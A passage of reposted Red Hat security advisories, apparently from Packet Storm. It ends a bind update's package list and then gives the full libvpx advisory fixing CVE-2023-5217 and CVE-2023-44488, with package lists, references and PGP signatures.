bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

noarch:  
bind-license-9.11.13-6.el8_2.6.noarch.rpm  
python3-bind-9.11.13-6.el8_2.6.noarch.rpm

x86_64:  
bind-9.11.13-6.el8_2.6.x86_64.rpm  
bind-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
bind-9.11.13-6.el8_2.6.src.rpm

x86_64:  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-export-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
bind-9.11.13-6.el8_2.6.src.rpm

ppc64le:  
bind-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-debugsource-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-export-devel-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-export-libs-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm

x86_64:  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-export-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
bind-9.11.13-6.el8_2.6.src.rpm

x86_64:  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-export-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3341  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvbAAoJENzjgjWX9erEJQQP/1u63fDo4Y+CbMcrsZYhtHR0  
SqwDMcUq5RSuLrDCJtCuJeYhqfQ/6ev0iNmLU6mGAFZ/JGFnsQ3KfaIOc2040nZZ  
uuzzhy6xckqDN5oGgoKU0E4PJ4Pc+bbc40yVXT+Fx6fwsxZzRdDt0ML3TT+iDz+9  
pmZECWUVG9xIR/gQwIv57aU0bqPTkydVUOemrUt9+ngpT1Oz+2V9UZovM6fcIQEs  
C1Qrw4B/fSXPHozaJyZRcu+In3mAx710Ta7pq36sBgm+E5j1pxW35YO558C/OlVW  
sZKUqJ0bgPn0YKR0BLBOt4UhWb2Nmm+ZS9thQpOMnJhQaNqpQRHDCZ27eyDobqUR  
H0HL47QfOHopOzHRbYcxXj9Vxi9Q4rhLvoBM7Op7bMgtNHUMVn/XExTNF4QCsX4L  
J6Bt8yDNg3z03JnB8V8cwrMtMgY4zukTT523xJJi1Jq90WeRkSLlc9KCtrD5ZVNW  
SLhOcKcYrnTlkqjecrKv3yPrlaRcqXs0nywyb8Via6Xg1bB2G34LchqduC9Ge+Bd  
Hw1WXScIOlwvugCQRkDzfXVgG6hMSeLOsSOvB1Ix3kc1fnhB9/n1+V9cCkgEOpke  
Kn7+ECL+KYyntI5N/GwdpJ/fSRHgnpZPCYi+njzVtZJ7RioRBJhg162/uGh+/eqa  
VCcxSvEAEImvs4jppJlh  
=/zch  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5527-01

Red Hat Security Advisory 2023-5539-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5539  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
libvpx-1.9.0-7.el9_2.src.rpm

aarch64:  
libvpx-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-1.9.0-7.el9_2.s390x.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-1.9.0-7.el9_2.i686.rpm  
libvpx-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-devel-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-devel-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-devel-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-devel-1.9.0-7.el9_2.i686.rpm  
libvpx-devel-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erEHmkP/j76TS36r/5pmVKxp+KznrJ2  
B60LOzDV21Hhca6NRy/moHcSIfQEkty0fxWBQ8HqNrZ0mQRZNNFz1hOXZ097eH6B  
v9fRdFMeyqT5PFpPjU5y+gmyxt43ZCh7LEPBQvMGDCnkW4M8NUbE0y9uxjMiAe19  
3zDDcLA+ssy7Z3K594ICHtuk5Rx8a5iIpRUbf63BBRTRlSPzsQ54FBi3zMSXIYDF  
lMcXbTHq8ysjjrUNDHag89Kg2Xt4XXoC9+W+E1PFqfnlZBzYttXb25yiJJfkvp9k  
s6AlYqjdQ0XHBpdiImuzknplOTFNIGfXePGM8cCqK5P752dmhg10RotbKNRCP8sj  
r/nlCUyXIV0RuFw6qDC0NFzxfXo8K/VUolHToa8BfxB+CzX+evRLDkCKJmEJv3wo  
/rt/W9lzALtXEwK+XqPs9pP/I9zRUXeaFocBKUaK8Mugiun8wwZfB5+sowa18+7V  
8Y22YmtASXuAHhPPCRa1+UWpmzEwXRQMVnQcZSZfLadBJ141lJhMlwwoxbNNz+dj  
OBERh/JYwxBLWK80wmYjUa0751umz+P8UxrqEeA0OCpZ5Zt+GG9gMbVRIeYgP1kO  
LH4h27uhhRBDZ9rRnu3h7FWezeBvRRMwsCrElyEbQa/47aCmpOFIwqdiYwN26SCF  
YMobQwgofyBKFBn5GBId  
=/LcT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm